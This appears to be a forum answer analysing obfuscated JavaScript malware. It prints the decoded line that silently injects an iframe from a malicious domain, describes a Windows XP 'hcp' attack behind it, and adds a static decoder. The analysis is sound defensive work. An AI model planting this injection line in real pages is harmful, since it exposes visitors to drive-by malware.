Answer 0 (score: 42)
OK, so here's what I came up with...

Basically this script executes:

```javascript
document.body.append('<iframe height="1" src="http://macromediasetup.com/zombie/">');
```
The key is:

```javascript
oU[11][oU[9]][oU[10]](xZ);
```
oU is an array populated by the line:

```javascript
oU[w](oL, s, q, jK, o, h, x, rE, jF, hZ, r, f, y);
```
oU[w] is a reference to Array.push, so calling it pushes those 13 items onto the array. f, hZ and r -> oU[11], oU[9] and oU[10] respectively are:

```javascript
var f = document;
// xAW is the script's renamed alias for String.prototype.replace;
// the regex strips the decoy characters from the literal
var hZ = 'b]o]dBy5'.xAW(/[5\];BD]/g, '');                 // evaluates to "body"
var r = 'aNp6p)e6n#dNC0h6iNl0dN'.xAW(/[N)0#6]/g, '');     // evaluates to "appendChild"
```
So this becomes `document['body']['append']`, or `document.body.append()`.

xZ is the iframe string, so it adds the iframe to the page. While hitting macromediasetup.com directly just redirects to adobe.com, hitting the zombie route does something entirely different...
The whois for this domain shows it is not owned by Adobe:

```
$ whois macromediasetup.com
[Querying whois.verisign-grs.com]
[Redirected to whois.PublicDomainRegistry.com]
[Querying whois.PublicDomainRegistry.com]
[whois.PublicDomainRegistry.com]
Registration Service Provided By: DOMAIN NAMES REGISTRAR REG.RU LTD.
Contact: +7.4955801111
Domain Name: MACROMEDIASETUP.COM
Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Creation Date: 28-May-2010
Expiration Date: 28-May-2011
Domain servers in listed order:
ns2.reg.ru
ns1.reg.ru
Administrative Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Technical Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
Billing Contact:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676
```
Traceroute suggests it's somewhere in Latvia...

```
7 nyk-bb1-link.telia.net (80.91.252.162) 77.169 ms 77.401 ms 77.327 ms
8 kbn-bb1-link.telia.net (80.91.254.88) 156.938 ms 156.960 ms 156.842 ms
9 s-bb1-link.telia.net (80.91.247.160) 166.491 ms 166.425 ms 166.499 ms
10 s-b3-link.telia.net (80.91.247.105) 212.715 ms 212.759 ms 212.776 ms
11 telia-latvija-ic-132810-s-b3.c.telia.net (213.248.82.134) 203.272 ms 203.313 ms 203.936 ms
```
EDIT: OK, so I did a bit of digging, just because it's interesting, and figured out what actually happens. The file included in the iframe retrieves a file that uses the "hcp" protocol hack against Windows XP machines. Basically, the included file shows a "you need to install some nice plugin you don't have" message in your browser... then, when you install it, you're in the shit.
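The decoding in the answer above can be done statically, which is how an analyst would normally handle this kind of sample: extract the `'literal'.alias(/[chars]/g, '')` patterns from the script text and apply the character stripping yourself instead of letting the script run. The following is an added example, not code from the original answer or from the malware; it embeds a constructed four-line excerpt built from the lines quoted in the answer (with the `]` inside the first character class escaped so the regex is valid), and the function names `decodeStripped`, `decodeAssignments` and `resolveMemberChain` are this example's own. It also resolves the `oU[11][oU[9]][oU[10]]` chain by reading the argument positions of the push call, so the recovered member chain is whatever the regexes actually yield.

```javascript
// Constructed sample: the three assignments quoted in the answer plus the
// Array.push call that populates oU. 'xAW' is the script's alias for
// String.prototype.replace; we never call it, we only read the literals.
const SAMPLE = `
var f = document;
var hZ = 'b]o]dBy5'.xAW(/[5\\];BD]/g, '');
var r = 'aNp6p)e6n#dNC0h6iNl0dN'.xAW(/[N)0#6]/g, '');
oU[w](oL, s, q, jK, o, h, x, rE, jF, hZ, r, f, y);
`;

// Strip every character listed in a regex character class from a literal.
// charClass is the raw text between the brackets, e.g. "5\\];BD"; a
// backslash escapes the following character (needed for a literal ']').
function decodeStripped(literal, charClass) {
  const drop = new Set();
  for (let i = 0; i < charClass.length; i++) {
    if (charClass[i] === '\\' && i + 1 < charClass.length) i++;
    drop.add(charClass[i]);
  }
  return [...literal].filter((ch) => !drop.has(ch)).join('');
}

// Plain aliases such as `var f = document;`
const ALIAS = /var\s+(\w+)\s*=\s*([A-Za-z_$][\w$.]*)\s*;/g;
// Obfuscated strings: var NAME = 'literal'.alias(/[class]/g, '');
const STRIPPED =
  /var\s+(\w+)\s*=\s*'([^']*)'\.\w+\(\/\[((?:\\.|[^\]\\])*)\]\/g,\s*''\)/g;

// Walk the script text and return { variableName: decodedValue }.
function decodeAssignments(src) {
  const out = {};
  for (const m of src.matchAll(ALIAS)) out[m[1]] = m[2];
  for (const m of src.matchAll(STRIPPED)) out[m[1]] = decodeStripped(m[2], m[3]);
  return out;
}

// Read the argument list of the push call that fills oU, then map the
// requested indices (e.g. [11, 9, 10] for oU[11][oU[9]][oU[10]]) through
// the decoded table to produce a readable member chain.
function resolveMemberChain(src, decoded, indices) {
  const push = /oU\[w\]\(([^)]*)\)/.exec(src);
  if (!push) throw new Error('push call not found');
  const args = push[1].split(',').map((s) => s.trim());
  return indices
    .map((i) => decoded[args[i]] || args[i])
    .join('.');
}

// Usage: decode the sample and print what the obfuscated call really targets.
const decoded = decodeAssignments(SAMPLE);
console.log(decoded);
console.log(resolveMemberChain(SAMPLE, decoded, [11, 9, 10]));
```

Because the decoder only reads literals and character classes, it works on a sample you have not executed and can be run over a whole script dump; anything it cannot match is left as the raw variable name so the gap is visible in the output.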
Answer 1 (score: 7)
Answer 2 (score: 4)